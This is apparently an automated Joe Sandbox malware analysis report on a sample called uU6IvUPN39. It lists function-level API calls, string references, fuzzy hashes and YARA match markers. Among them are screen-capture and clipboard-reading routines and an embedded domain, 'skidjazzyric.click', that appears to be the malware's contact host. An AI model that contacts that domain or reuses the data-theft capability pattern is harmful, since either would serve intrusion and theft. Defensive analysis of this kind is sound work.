Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

Function 006AAC1D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006AAC6E

Memory Dump Source

Source File: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6aa000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 654d66beeef3c0fd6fc42f7114874e6979c4109110784aad5d27aa3cfd680a7a
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 1F113C79A00208EFDB01DF98C985E98BBF6AF08750F058095F9489B362D371EE50DF91

Non-executed Functions

Function 00423EFF Relevance: 72.8, Strings: 58, Instructions: 350COMMON

Download Yara Rule

Strings

x, xrefs: 004241FA
(, xrefs: 004241AD
}, xrefs: 00424390
r, xrefs: 004241B4
6D135015ECAF0672D0632DF0E28DC412, xrefs: 004240BF
J, xrefs: 0042417C
n, xrefs: 00423FCE
4, xrefs: 00423FE2
\, xrefs: 00424136
b, xrefs: 00424224
7, xrefs: 00423FD6
:, xrefs: 00424253
1, xrefs: 00423FDA
Q, xrefs: 004241C9
@, xrefs: 00424152
h, xrefs: 00424175
v, xrefs: 004241D0
1, xrefs: 00423FC2
X, xrefs: 0042411A
A, xrefs: 004243AC
&, xrefs: 0042414B
B, xrefs: 00424144
0, xrefs: 00423FD2
L, xrefs: 004241A6
z, xrefs: 004241EC
n, xrefs: 00424257
>, xrefs: 00423F4E
@, xrefs: 00424263
q, xrefs: 00423FDE
p, xrefs: 004241C2
x, xrefs: 00423F3E
N, xrefs: 0042439E
f, xrefs: 00424237
?, xrefs: 00424183
N, xrefs: 00424198
h, xrefs: 0042424F
2, xrefs: 00423FC6
?, xrefs: 00423F42
d, xrefs: 0042423F
j, xrefs: 00424247
0, xrefs: 00423FE6
-, xrefs: 004241BB
V, xrefs: 00423F52
l, xrefs: 0042425F
/, xrefs: 00423F46
`, xrefs: 0042422F
skidjazzyric.click, xrefs: 00424487
f, xrefs: 00423FEE
|, xrefs: 00424216
8, xrefs: 00423F4A
t, xrefs: 004241DE
>, xrefs: 00423FEA
F, xrefs: 00424160
&, xrefs: 00423FCA
H, xrefs: 0042418A
D, xrefs: 0042416E
^, xrefs: 00424128
~, xrefs: 00424208

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: &$&$($-$/$0$0$1$1$2$4$6D135015ECAF0672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$skidjazzyric.click$t$v$x$x$z$|$}$~
API String ID: 0-3084380803
Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction ID: 27bd2a0d4c2ee2dbe7fab43400867feab0dee6ac78a78b22b0fd1ff9dbe20428
Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction Fuzzy Hash: 45026021D087D989DB22C67C8C483CDBFA11B63324F4843EDD5E86B3D6D6B90946CB66

Function 02154166 Relevance: 72.8, Strings: 58, Instructions: 350COMMON

Download Yara Rule

Strings

`, xrefs: 02154496
/, xrefs: 021541AD
^, xrefs: 0215438F
f, xrefs: 0215449E
x, xrefs: 021541A5
l, xrefs: 021544C6
F, xrefs: 021543C7
@, xrefs: 021544CA
n, xrefs: 02154235
j, xrefs: 021544AE
7, xrefs: 0215423D
L, xrefs: 0215440D
0, xrefs: 0215424D
&, xrefs: 021543B2
n, xrefs: 021544BE
N, xrefs: 021543FF
&, xrefs: 02154231
D, xrefs: 021543D5
>, xrefs: 021541B5
d, xrefs: 021544A6
p, xrefs: 02154429
r, xrefs: 0215441B
x, xrefs: 02154461
Q, xrefs: 02154430
b, xrefs: 0215448B
V, xrefs: 021541B9
N, xrefs: 02154605
1, xrefs: 02154241
?, xrefs: 021541A9
6D135015ECAF0672D0632DF0E28DC412, xrefs: 02154326
0, xrefs: 02154239
|, xrefs: 0215447D
:, xrefs: 021544BA
skidjazzyric.click, xrefs: 021546EE
X, xrefs: 02154381
1, xrefs: 02154229
q, xrefs: 02154245
z, xrefs: 02154453
v, xrefs: 02154437
~, xrefs: 0215446F
B, xrefs: 021543AB
J, xrefs: 021543E3
(, xrefs: 02154414
h, xrefs: 021543DC
-, xrefs: 02154422
?, xrefs: 021543EA
H, xrefs: 021543F1
}, xrefs: 021545F7
4, xrefs: 02154249
f, xrefs: 02154255
A, xrefs: 02154613
\, xrefs: 0215439D
h, xrefs: 021544B6
>, xrefs: 02154251
@, xrefs: 021543B9
8, xrefs: 021541B1
2, xrefs: 0215422D
t, xrefs: 02154445

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: &$&$($-$/$0$0$1$1$2$4$6D135015ECAF0672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$skidjazzyric.click$t$v$x$x$z$|$}$~
API String ID: 0-3084380803
Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction ID: 7049a9622203a9b96d0941dc6cb55301c1ff2ff5a64c8bd667cd979f8b899d5f
Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
Instruction Fuzzy Hash: 5B026F21D087D989DB22C6BC8C483CDBFA11B63224F1883DDD4E86B3D6D7B90546CB62

Function 0043A4EF Relevance: 54.1, Strings: 43, Instructions: 311COMMON

Download Yara Rule

Strings

m, xrefs: 0043A7E0
}, xrefs: 0043A636
A, xrefs: 0043A652
G, xrefs: 0043A67C
o, xrefs: 0043A5D4
L, xrefs: 0043A69F
i, xrefs: 0043A5AA
%, xrefs: 0043A525
w, xrefs: 0043A60C
c, xrefs: 0043A79A
<, xrefs: 0043A75B
C, xrefs: 0043A660
>, xrefs: 0043A764
E, xrefs: 0043A66E
=, xrefs: 0043A517
:, xrefs: 0043A509
k, xrefs: 0043A5B8
D, xrefs: 0043A4FB
q, xrefs: 0043A5E2
o, xrefs: 0043A7EE
e, xrefs: 0043A58E
k, xrefs: 0043A7D2
c, xrefs: 0043A580
i, xrefs: 0043A7C4
a, xrefs: 0043A78C
m, xrefs: 0043A5C6
y, xrefs: 0043A61A
9, xrefs: 0043A541
a, xrefs: 0043A572
e, xrefs: 0043A7A8
M, xrefs: 0043A6A6
u, xrefs: 0043A5FE
K, xrefs: 0043A698
0, xrefs: 0043A936
3, xrefs: 0043A54F
x, xrefs: 0043A533
g, xrefs: 0043A7B6
g, xrefs: 0043A59C
{, xrefs: 0043A628
s, xrefs: 0043A5F0
+, xrefs: 0043A55D
n, xrefs: 0043A7E7
I, xrefs: 0043A68A

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
API String ID: 0-1785674967
Opcode ID: 5c6dbee6ecf3bd3c3c628f116cafe9bcc0538f1137003045660c0d61d6d29134
Instruction ID: 5a335782380f72e06434a0b7d1c84293c6c1cbd051fad8399b30b8532d7f13f9
Opcode Fuzzy Hash: 5c6dbee6ecf3bd3c3c628f116cafe9bcc0538f1137003045660c0d61d6d29134
Instruction Fuzzy Hash: 0EF170319086E98ADB22C63C8C443DDBFB15B56324F0847D9D0A96B3D2C7794F86CB66

Function 0216A756 Relevance: 54.1, Strings: 43, Instructions: 311COMMON

Download Yara Rule

Strings

u, xrefs: 0216A865
o, xrefs: 0216AA55
k, xrefs: 0216AA39
K, xrefs: 0216A8FF
g, xrefs: 0216AA1D
w, xrefs: 0216A873
:, xrefs: 0216A770
m, xrefs: 0216AA47
}, xrefs: 0216A89D
{, xrefs: 0216A88F
>, xrefs: 0216A9CB
o, xrefs: 0216A83B
M, xrefs: 0216A90D
q, xrefs: 0216A849
e, xrefs: 0216AA0F
s, xrefs: 0216A857
9, xrefs: 0216A7A8
i, xrefs: 0216A811
c, xrefs: 0216A7E7
e, xrefs: 0216A7F5
=, xrefs: 0216A77E
D, xrefs: 0216A762
g, xrefs: 0216A803
x, xrefs: 0216A79A
+, xrefs: 0216A7C4
C, xrefs: 0216A8C7
0, xrefs: 0216AB9D
E, xrefs: 0216A8D5
k, xrefs: 0216A81F
A, xrefs: 0216A8B9
G, xrefs: 0216A8E3
y, xrefs: 0216A881
c, xrefs: 0216AA01
a, xrefs: 0216A9F3
L, xrefs: 0216A906
I, xrefs: 0216A8F1
m, xrefs: 0216A82D
<, xrefs: 0216A9C2
3, xrefs: 0216A7B6
n, xrefs: 0216AA4E
i, xrefs: 0216AA2B
%, xrefs: 0216A78C
a, xrefs: 0216A7D9

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
API String ID: 0-1785674967
Opcode ID: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
Instruction ID: 19a7db1aaa9dbb9bfc9e6820904345c4cfe86f3aa11d5eebc88bd9d2e45fbed0
Opcode Fuzzy Hash: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
Instruction Fuzzy Hash: B4F171319086E98ADB32CA3C8C483DDBFA25F52324F0847D9D0A96B3D2C7754B85CB61

Function 00439923 Relevance: 50.4, Strings: 40, Instructions: 391COMMON

Download Yara Rule

Strings

x, xrefs: 00439B7F
1, xrefs: 004399BB
c, xrefs: 00439B07
5, xrefs: 004399D7
*, xrefs: 00439A7F
{, xrefs: 00439B77
_, xrefs: 00439ABF
=, xrefs: 00439A01
-, xrefs: 004399AD
Z, xrefs: 00439AF7
2, xrefs: 00439A55
$, xrefs: 004399E5
e, xrefs: 00439E1C
Y, xrefs: 00439AE7
F, xrefs: 00439AC7
=, xrefs: 00439B8F
], xrefs: 00439ACF
I, xrefs: 00439D0E
f, xrefs: 00439E23
U, xrefs: 00439AFF
i, xrefs: 00439B2F
j, xrefs: 00439B1F
F, xrefs: 00439A97
<, xrefs: 00439A0F
s, xrefs: 00439B4F
i, xrefs: 00439B6F
O, xrefs: 00439D16
S, xrefs: 00439A8F
j, xrefs: 00439B37
t, xrefs: 00439B5F
4, xrefs: 00439DFF
=, xrefs: 00439A1D
7, xrefs: 00439A71
H, xrefs: 00439AEF
~, xrefs: 00439B3F
G, xrefs: 00439AD7
S, xrefs: 00439D26
r, xrefs: 00439BB7
w, xrefs: 00439B17
T, xrefs: 00439BCF

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
API String ID: 0-3597792095
Opcode ID: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
Instruction ID: be7a992d2d4842197a1748c1c2319ac7c28ec811ade833faf29c06d267706092
Opcode Fuzzy Hash: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
Instruction Fuzzy Hash: E8224F219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66

Function 02169B8A Relevance: 50.4, Strings: 40, Instructions: 391COMMON

Download Yara Rule

Strings

F, xrefs: 02169CFE
f, xrefs: 0216A08A
H, xrefs: 02169D56
r, xrefs: 02169E1E
j, xrefs: 02169D86
s, xrefs: 02169DB6
F, xrefs: 02169D2E
i, xrefs: 02169DD6
U, xrefs: 02169D66
S, xrefs: 02169F8D
t, xrefs: 02169DC6
Z, xrefs: 02169D5E
{, xrefs: 02169DDE
$, xrefs: 02169C4C
e, xrefs: 0216A083
=, xrefs: 02169C68
j, xrefs: 02169D9E
x, xrefs: 02169DE6
], xrefs: 02169D36
I, xrefs: 02169F75
=, xrefs: 02169C84
O, xrefs: 02169F7D
Y, xrefs: 02169D4E
-, xrefs: 02169C14
2, xrefs: 02169CBC
4, xrefs: 0216A066
7, xrefs: 02169CD8
1, xrefs: 02169C22
*, xrefs: 02169CE6
i, xrefs: 02169D96
=, xrefs: 02169DF6
S, xrefs: 02169CF6
G, xrefs: 02169D3E
w, xrefs: 02169D7E
T, xrefs: 02169E36
<, xrefs: 02169C76
~, xrefs: 02169DA6
5, xrefs: 02169C3E
c, xrefs: 02169D6E
_, xrefs: 02169D26

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
API String ID: 0-3597792095
Opcode ID: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
Instruction ID: 708774573f2be2c85ddfbbb824a319d89cf762e0dc21d890c972bd4e43369a41
Opcode Fuzzy Hash: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
Instruction Fuzzy Hash: F4225D219087EA89DB32C67C8C483DDBEA15B67224F1843D9D4F87B3D2C7750A46CB66

Function 0216BAD7 Relevance: 32.4, APIs: 8, Strings: 10, Instructions: 880memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0216BF33
SysAllocString.OLEAUT32(37C935C6), ref: 0216BFAD
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0216BFEB
SysAllocString.OLEAUT32(37C935C6), ref: 0216C050
SysAllocString.OLEAUT32(37C935C6), ref: 0216C137
VariantInit.OLEAUT32(?), ref: 0216C1A5

Strings

k"@ , xrefs: 0216C0A1
M, xrefs: 0216BDC2
e?^, xrefs: 0216BEB6
#~|, xrefs: 0216BB0E
:;$%, xrefs: 0216C553
n:T8, xrefs: 0216C0B1
F*R(, xrefs: 0216C091
[&h$, xrefs: 0216C099
#~|, xrefs: 0216BB04
96, xrefs: 0216C0B9

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction ID: 74cc076390ab0d0aa6ac771a21c249616cf5fdc17dbd59343eb637cf597d38c8
Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction Fuzzy Hash: 6352E0726483408BD724CF28C8997AFBBE1EF85314F188A2DE5D597391D774D806CB92

Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00436989
GetSystemMetrics.USER32(0000004C), ref: 00436999
GetSystemMetrics.USER32(0000004D), ref: 004369A1
GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
DeleteObject.GDI32(00000000), ref: 004369C1
CreateCompatibleDC.GDI32(00000000), ref: 004369D0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
SelectObject.GDI32(00000000,00000000), ref: 004369E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

Strings

Y, xrefs: 00436BEE

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
String ID: Y
API String ID: 1298755333-3233089245
Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B

Function 004367F0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436804
GetClipboardData.USER32 ref: 0043681F
GlobalLock.KERNEL32 ref: 00436838
GetWindowLongW.USER32 ref: 0043689D
GlobalUnlock.KERNEL32 ref: 00436959
CloseClipboard.USER32 ref: 00436962

Strings

t, xrefs: 004368D6
{, xrefs: 004368BD
N, xrefs: 004368C2
C, xrefs: 004368B8
F, xrefs: 004368E0
E, xrefs: 004368B3
}, xrefs: 004368D1
B, xrefs: 004368C7
@, xrefs: 004368EA
O, xrefs: 004368CC
K, xrefs: 004368E5

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB

Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243

Strings

:@&F, xrefs: 00425393
.T'j, xrefs: 004253BB
+$e, xrefs: 00425165, 0042517A
+$e, xrefs: 004251F2
]RB, xrefs: 00425257
1D6Z, xrefs: 0042539B
?P:V, xrefs: 004253B3
C`<f, xrefs: 004253D3
,X*^, xrefs: 004253A3
%\)R, xrefs: 004253AB
XY, xrefs: 00425146

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
API String ID: 237503144-2846770461
Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46

Function 00419840 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419CE7
FreeLibrary.KERNEL32(?), ref: 00419D24

Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Strings

Wu, xrefs: 00419CE7, 00419D24
~|, xrefs: 00419B2E
if, xrefs: 00419B1C
pv, xrefs: 00419BB2
SP, xrefs: 00419BF2
vt, xrefs: 00419AFC
tj, xrefs: 00419BBA

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ~|$SP$if$Wu$pv$tj$vt
API String ID: 764372645-1279135394
Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A

Function 00425D6A Relevance: 15.8, Strings: 12, Instructions: 778COMMON

Download Yara Rule

Strings

-T,j, xrefs: 0042636E
qs, xrefs: 00425E96
4D2Z, xrefs: 00426346
+\1R, xrefs: 0042635A
(X#^, xrefs: 00426350
Wdz, xrefs: 00426396
&$, xrefs: 004266A0
$@7F, xrefs: 0042633C
2E1G, xrefs: 00426876
T`Sf, xrefs: 0042638C
uVw, xrefs: 00425EA0
8I>K, xrefs: 00426858

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84

Function 021560B7 Relevance: 15.5, Strings: 12, Instructions: 458COMMON

Download Yara Rule

Strings

2E1G, xrefs: 02156ADD
&$, xrefs: 02156907
Wdz, xrefs: 021565FD
T`Sf, xrefs: 021565F3
(X#^, xrefs: 021565B7
qs, xrefs: 021560FD
8I>K, xrefs: 02156ABF
+\1R, xrefs: 021565C1
4D2Z, xrefs: 021565AD
$@7F, xrefs: 021565A3
-T,j, xrefs: 021565D5
uVw, xrefs: 02156107

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
API String ID: 0-2419925205
Opcode ID: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
Instruction ID: 2e82740579f7d5d90379f769cffc20af85584b7e0a434fdcbb06edc383543e27
Opcode Fuzzy Hash: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
Instruction Fuzzy Hash: 34422CB0905369CFDB64CF56D981BCCBBB1FB05300F1185E8C59A6B262DB748A86CF85

Function 02149AA7 Relevance: 14.9, APIs: 2, Strings: 6, Instructions: 936COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 02149F4E
FreeLibrary.KERNEL32(?), ref: 02149F8B

Strings

tj, xrefs: 02149E21
vt, xrefs: 02149D63
pv, xrefs: 02149E19
SP, xrefs: 02149E59
if, xrefs: 02149D83
~|, xrefs: 02149D95

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: ~|$SP$if$pv$tj$vt
API String ID: 3664257935-1422159894
Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction ID: 1c6f201f01f7b76a730d7886f79e0a65450125d3040e26e269bc7b54ee1cbe8e
Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
Instruction Fuzzy Hash: 68622870689350AFE724CF14CC91B2FB7E2EFC5318F19862CE4999B290DB71A805CB55

Function 00417405 Relevance: 13.4, APIs: 4, Strings: 3, Instructions: 1110COMMON

Download Yara Rule

Strings

5&'d, xrefs: 004175E5
O, xrefs: 00417625
~, xrefs: 00418158

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID: 5&'d$O$~
API String ID: 0-1622812124
Opcode ID: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
Opcode Fuzzy Hash: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
